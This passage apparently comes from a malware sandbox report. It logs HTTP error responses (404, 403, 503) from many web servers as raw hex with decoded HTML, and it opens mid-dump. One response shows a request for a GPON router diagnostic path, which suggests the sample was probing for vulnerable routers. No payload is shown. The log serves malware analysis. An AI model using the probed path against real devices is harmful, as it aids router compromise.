61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 18 Mar 2024 08:59:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 18 Mar 2024 08:59:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.24.0Date: Mon, 18 Mar 2024 08:59:54 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 08:59:55 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 33 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 46 6f 72 62 69 64 64 65 6e 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Mon, 18 Mar 2024 08:59:55 GMTServer: ApacheRetry-After: 3600Upgrade: h2,h2cConnection: Upgrade, closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 49 51 2e 50 4c 20 2d 20 64 6f 6d 65 6e 61 20 31 32 37 2e 30 2e 30 2e 31 20 6a 65 73 74 20 75 74 72 7a 79 6d 79 77 61 6e 61 20 6e 61 20 73 65 72 77 65 72 61 63 68 20 49 51 20 50 4c 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6c 64 69 6e 66 6f 2e 69 71 2e 70 6c 2f 6d 61 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 09 09 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 53 69 74 65 20 54 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 09 09 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 31 30 37 30 35 34 38 39 2d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 09 09 09 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 3b 0d 0a 09 09 09 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 0d 0a 09 09 09 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 31 30 37 30 35 34 38 39 2d 31 27 29 3b 0d 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 71 2e 70 6c 2f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6c 64 69 6e 66 6f 2e 69 71 2e 70 6c 2f 69 6d 67 2f 6c 6f 67 6f 2e 73 76 67 22 20 61 6c 74 3d 22 50 6f 7a 6e 61 6a 20 75 73 c5 82 75 67 69 20 49 51 2e 50 4c 22 3e 3c 2f 61 3e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 64 6f 6d 65 6e 61 20 3c 73 74 72 6f 6e 67 3e 31 32 37
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cachePragma: no-cacheX-XSS-Protection: 1Content-Type: text/html; charset=utf-8Proxy-Connection: Keep-AliveConnection: Keep-AliveContent-Length: 613Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 5a 75 67 72 69 66 66 20 76 65 72 77 65 69 67 65 72 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 3e 0d 0a 3c 62 69 67 3e 3c 73 74 72 6f 6e 67 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 62 69 67 3e 3c 42 52 3e 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 3c 54 41 42 4c 45 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 50 61 64 64 69 6e 67 3d 31 20 77 69 64 74 68 3d 22 38 30 25 22 3e 0d 0a 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 3e 0d 0a 3c 62 69 67 3e 5a 75 67 72 69 66 66 20 76 65 72 77 65 69 67 65 72 74 20 28 70 6f 6c 69 63 79 5f 64 65 6e 69 65 64 29 3c 2f 62 69 67 3e 0d 0a 3c 42 52 3e 0d 0a 3c 42 52 3e 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 0d 0a 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 3e 0d 0a 44 65 72 20 5a 75 67 72 69 66 66 20 61 75 66 20 64 61 73 20 5a 69 65 6c 20 77 75 72 64 65 20 61 75 66 67 72 75 6e 64 20 65 69 6e 65 72 20 5a 75 67 72 69 66 66 73 72 65 67 65 6c 20 76 65 72 62 6f 74 65 6e 2e 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 0d 0a 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 3e 0d 0a 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 0d 0a 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 20 53 49 5a 45 3d 32 3e 0d 0a 3c 42 52 3e 0d 0a 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 0d 0a 3c 2f 54 41 42 4c 45 3e 0d 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><TITLE>Zugriff verweigert</TITLE></HEAD><BODY><FONT face="Helvetica"><big><strong></strong></big><BR></FONT><blockquote><TABLE border=0 cellPadding=1 width="80%"><TR><TD><FONT face="Helvetica"><big>Zugriff verweigert (policy_denied)</big><BR><BR></FONT></TD></TR><TR><TD><FONT face="Helvetica">Der Zugriff auf das Ziel wurde aufgrund einer Zugriffsregel verboten.</FONT></TD></TR><TR><TD><FONT face="Helvetica"></FONT></TD></TR><TR><TD><FONT face="Helvetica" SIZE=2><BR></FONT></TD></TR></TABLE></blockquote></FONT></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Content-Type: text/htmlDate: Sun, 08 Sep 2002 19:06:44 GMTLast-Modified: Sun, 08 Sep 2002 19:06:44 GMTAccept-Ranges: bytesConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 3f 69 6d 61 67 65 73 2f 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 22 3e 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>404 Not Found</H2>The requested URL '/GponForm/diag_Form?images/' was not found on this server.<HR><ADDRESS><A HREF=""></A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:57 GMTContent-Type: text/htmlContent-Length: 1400Connection: keep-aliveKeep-Alive: timeout=60Vary: Accept-EncodingETag: "5eafb054-578"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 10:48:21 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cachePragma: no-cacheX-XSS-Protection: 1Content-Type: text/html; charset=utf-8Proxy-Connection: Keep-AliveConnection: Keep-AliveContent-Length: 613Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 5a 75 67 72 69 66 66 20 76 65 72 77 65 69 67 65 72 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 3e 0d 0a 3c 62 69 67 3e 3c 73 74 72 6f 6e 67 3e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 62 69 67 3e 3c 42 52 3e 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 3c 54 41 42 4c 45 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 50 61 64 64 69 6e 67 3d 31 20 77 69 64 74 68 3d 22 38 30 25 22 3e 0d 0a 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 3e 0d 0a 3c 62 69 67 3e 5a 75 67 72 69 66 66 20 76 65 72 77 65 69 67 65 72 74 20 28 70 6f 6c 69 63 79 5f 64 65 6e 69 65 64 29 3c 2f 62 69 67 3e 0d 0a 3c 42 52 3e 0d 0a 3c 42 52 3e 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 0d 0a 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 3e 0d 0a 44 65 72 20 5a 75 67 72 69 66 66 20 61 75 66 20 64 61 73 20 5a 69 65 6c 20 77 75 72 64 65 20 61 75 66 67 72 75 6e 64 20 65 69 6e 65 72 20 5a 75 67 72 69 66 66 73 72 65 67 65 6c 20 76 65 72 62 6f 74 65 6e 2e 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 0d 0a 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 3e 0d 0a 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 0d 0a 3c 54 52 3e 3c 54 44 3e 0d 0a 3c 46 4f 4e 54 20 66 61 63 65 3d 22 48 65 6c 76 65 74 69 63 61 22 20 53 49 5a 45 3d 32 3e 0d 0a 3c 42 52 3e 0d 0a 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 54 44 3e 3c 2f 54 52 3e 0d 0a 3c 2f 54 41 42 4c 45 3e 0d 0a 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 3c 2f 46 4f 4e 54 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><TITLE>Zugriff verweigert</TITLE></HEAD><BODY><FONT face="Helvetica"><big><strong></strong></big><BR></FONT><blockquote><TABLE border=0 cellPadding=1 width="80%"><TR><TD><FONT face="Helvetica"><big>Zugriff verweigert (policy_denied)</big><BR><BR></FONT></TD></TR><TR><TD><FONT face="Helvetica">Der Zugriff auf das Ziel wurde aufgrund einer Zugriffsregel verboten.</FONT></TD></TR><TR><TD><FONT face="Helvetica"></FONT></TD></TR><TR><TD><FONT face="Helvetica" SIZE=2><BR></FONT></TD></TR></TABLE></blockquote></FONT></BODY></HTML>
